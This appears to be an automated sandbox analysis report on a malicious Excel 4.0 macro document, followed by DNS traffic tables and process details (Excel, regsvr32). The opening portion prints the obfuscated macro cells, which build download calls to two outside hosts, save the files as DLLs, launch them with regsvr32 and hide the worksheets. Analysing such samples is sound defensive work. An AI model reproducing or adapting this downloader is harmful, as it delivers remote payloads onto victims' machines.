,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,R,J,,CAL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,EXEC,,,0,,LM,JC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,on,CB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,wnl,,oadT,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Fil,,LDo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,""")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"""",,,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,&,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""r",,,,0,0,,,shadiinfo.com/2DP6mQeg/pt.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,eg,,,,,,,,treasurechestcaribbean.com/pZ2Z61bqa/pt.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,svr32 -s ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=,=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
"=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=FORMULA('Doc2'!BL28,'Doc3'!AY16)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=FORMULA(""U""&'Doc3'!AY16&'Doc2'!BL29&'Doc2'!BL30,'Doc3'!AY10)",,,,,,,,,,,,"=FORMULA('Doc2'!BO36,'Doc3'!AY13)",,,,,,"=FORMULA('Doc2'!BM28&'Doc2'!BM29&'Doc2'!BM30&""B"",'Doc3'!AY12)",,,,,,"=FORMULA(before.5.35.61.sheet!BP47,'Doc3'!AY17)",,,,,,"=FORMULA('Doc2'!BO37,'Doc3'!AY14)",,,,,,"=FORMULA('Doc2'!BK39,'Doc3'!AY18)",,,,,,"=FORMULA(""U""&'Doc3'!AY16&'Doc2'!BL32&'Doc2'!BJ31&'Doc2'!BL31&'Doc2'!BL34&'Doc2'!BJ32&""eA"",'Doc3'!AY11)",,,,,,"=FORMULA('Doc2'!BJ39&'Doc2'!BO28&'Doc3'!AY17&'Doc2'!BJ43&'Doc3'!AY10&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&'Doc3'!AY11&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&'Doc3'!AY12&'Doc2'!BJ41&'Doc2'!BJ45&'Doc2'!BJ42&'Doc2'!BJ41&""https://""&'Doc3'!AY14&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&before.5.35.61.sheet!BO53&'Doc2'!BJ41&'Doc2'!BJ45&'Doc2'!BJ45&'Doc2'!BJ44,'Doc3'!AW11)",,,,,,,,,,,,"=WORKBOOK.HIDE(""Doc2"",1)",,,,,,"=WORKBOOK.HIDE(""Doc4"",1)=WORKBOOK.HIDE(""Doc3"",1)",,,,,,"=RIGHT(""LdecvsbgvrsxLxrgxgL"",1)",,,,,,,,,,,,"=FORMULA('Doc3'!AY18&'Doc2'!BG29&'Doc2'!BG36&'Doc2'!BG37&'Doc2'!BG38&'Doc2'!BG34&'Doc2'!BG35&'Doc2'!BG34&before.5.35.61.sheet!BO52&'Doc2'!BG33,'Doc3'!AW14)",,,,,,"=FORMULA('Doc3'!AY18&'Doc2'!BG29&'Doc2'!BG36&'Doc2'!BG37&'Doc2'!BG38&'Doc2'!BG34&'Doc2'!BG35&'Doc2'!BG34&before.5.35.61.sheet!BO53&'Doc2'!BG33,'Doc3'!AW15)",,,,,,,,,,,"=""..\covi1.dll""","=FORMULA('Doc2'!BJ39&'Doc2'!BO28&'Doc3'!AY17&'Doc2'!BJ43&'Doc3'!AY10&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&'Doc3'!AY11&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&'Doc3'!AY12&'Doc2'!BJ41&'Doc2'!BJ45&'Doc2'!BJ42&'Doc2'!BJ41&""https://""&'Doc3'!AY13&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&before.5.35.61.sheet!BO52&'Doc2'!BJ41&'Doc2'!BJ45&'Doc2'!BJ45&'Doc2'!BJ44,'Doc3'!AW10)=SUMXMY2(452354,45245)",,,,,"=""..\covi2.dll""",,,,,,,,,,,,,,,,,,,=GOTO('Doc3'!AW2),,,,,,,,,,,,,,,,,,,,,,,"=LEFT(""LdecvsbgvrsxLxrgxg"",1)",
Network Behavior |
---|
Network Port Distribution |
---|
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 11, 2021 15:03:35.524085045 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:03:35.574498892 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:03:37.522847891 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:03:37.576275110 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:03:38.964957952 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:03:39.026405096 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:03:40.098741055 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:03:40.157546997 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:03:43.984872103 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:03:44.035260916 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:03:46.270370960 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:03:46.320414066 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:03:47.533371925 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:03:47.546931982 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:03:47.596909046 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:03:47.619085073 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:03:48.159018993 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:03:48.233679056 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:03:49.184959888 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:03:49.235997915 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:03:49.248773098 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:03:49.287132978 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:03:50.231910944 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:03:50.293401957 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:03:50.997288942 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:03:51.047502041 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:03:52.095892906 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:03:52.148128033 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:03:52.279263020 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:03:52.340960979 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:03:53.349952936 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:03:53.401583910 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:03:54.432924032 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:03:54.482985973 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:03:56.329911947 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:03:56.383214951 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:04:01.329938889 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:04:01.380343914 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:04:02.289630890 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:04:02.342637062 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:04:03.758740902 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:04:03.828067064 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:04:04.022268057 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:04:04.085736990 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:04:05.224945068 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:04:05.278206110 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:04:06.273678064 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:04:06.326947927 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:04:07.188503027 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:04:07.241465092 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:04:08.145422935 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:04:08.198684931 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:04:42.619568110 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:04:42.680991888 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:04:50.452900887 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:04:50.527192116 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:05:04.681912899 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:05:04.828782082 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:05:05.701711893 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:05:05.763504982 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:05:06.841428041 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:05:06.902976036 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:05:07.357486010 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:05:07.418438911 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:05:08.026968002 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:05:08.162451982 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:05:08.175432920 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:05:08.250215054 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:05:08.781661987 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:05:08.835592031 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:05:09.508780003 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:05:09.567240000 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:05:10.392770052 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:05:10.456013918 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:05:11.251660109 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:05:11.310805082 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:05:11.767421961 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:05:11.825818062 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:05:29.479532957 CEST | 60689 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:05:29.553693056 CEST | 53 | 60689 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 15:05:30.794128895 CEST | 64206 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 15:05:30.852910042 CEST | 53 | 64206 | 8.8.8.8 | 192.168.2.4 |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 15:03:46 |
Start date: | 11/06/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1250000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:03:49 |
Start date: | 11/06/2021 |
Path: | C:\Windows\splwow64.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff65ae00000 |
File size: | 130560 bytes |
MD5 hash: | 8D59B31FF375059E3C32B17BF31A76D5 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:04:01 |
Start date: | 11/06/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1040000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:04:02 |
Start date: | 11/06/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1040000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|